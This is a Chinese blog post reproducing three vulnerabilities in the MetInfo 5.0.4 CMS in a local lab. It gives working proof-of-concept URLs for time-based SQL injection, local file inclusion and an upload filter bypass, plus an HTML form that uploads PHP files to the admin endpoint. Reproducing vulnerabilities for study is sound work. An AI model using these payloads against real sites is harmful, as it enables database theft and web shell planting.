metinfov5.0.4漏洞复现
metinfov5.0.4漏洞復現
最近學習,metinfov5.0.4漏洞復現,個人感覺這次的漏洞還是比較有意思的,為什么呢?原因是這次的3個漏洞都跟一個漏洞有關,這個漏洞就是變量覆蓋覆蓋漏洞.
簡單講就是用戶傳進去的值變成了一個新的變量覆蓋了原代碼的變量,從而被我們利用.
產生的原因是因為編程人員在進行變量傳值時,使用了雙(“$$”)符號 .
下面開始漏洞復現
測試環境:
phpstudy #一個集成環境包含php+mysql
php源碼(cms)
metinfov5.0.4 #源碼大家可以去網上下載
測試目標:
三個經典漏洞:
SQLi(注入)
文件包含
文件上傳
漏洞位置:
SQLi 注入漏洞位置:
http://localhost/metinfoV5.0.4/about/show.php?lang=cn&id=22
POC:
http://localhost/metinfoV5.0.4/about/show.php?lang=cn&id=22 and if(ord(substr(database(),1,1))=109,sleep(5),0) –+
文件包含漏洞位置:
http://localhost/metinfoV5.0.4/about/index.php
POC: http://localhost/metinfoV5.0.4/about/index.php?fmodule=7&module=../../phpinfo.php
為了幫助我們更好的理解,我們可以先在www目錄下寫一個phpinfo.php的文件,接著使用文件包含進行打開,發現成功打開,證明了此處存在文件包含漏洞.文件上傳漏洞位置:
http://localhost/metinfoV5.0.4/admin/include/uploadify.php
POC:
http://localhost/MetInfoV5.0.4/admin/include/uploadify.php?tablepre=xx&met_lang=met_lang&lang=cn&met_admin_table=met_admin_table%20where%20usertype=3%23&metinfo_admin_id=1&metinfo_admin_pass=2&type=upfile&met_file_format=jpg|pphphp
為了便于利用,我們把它寫成一個HTML文件:
<meta charset="utf-8"> <form enctype="multipart/form-data"method="post"name="myfrom"action="http://localhost/MetInfoV5.0.4/admin/include/uploadify.php?tablepre=xx&met_lang=met_lang&lang=cn&met_admin_table=met_admin_table%20where%20usertype=3%23&metinfo_admin_id=1&metinfo_admin_pass=2&type=upfile&met_file_format=jpg|pphphp" ><input name="Filedata" type="file" size=20><input type="submit" name="Submit" value="提交信息"> </form>之后我們只要打開寫好的html文件選擇.php格式的文件上傳就可以了!上傳成功后,我們進入該網站的upload/file/目錄下,發現我們的上傳文件,證明,文件上傳漏洞實現.
到此,漏洞復現基本完成,剩下的就是漏洞產生的原因了,由于時間有限,就不一一分析原因了,大家有興趣的可以去分析源代碼,來找出產生的原因.
總結
以上是生活随笔為你收集整理的metinfov5.0.4漏洞复现的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: metasploit终端命令大全 MSF
- 下一篇: 常见服务器解析漏洞(IIS,Nginx,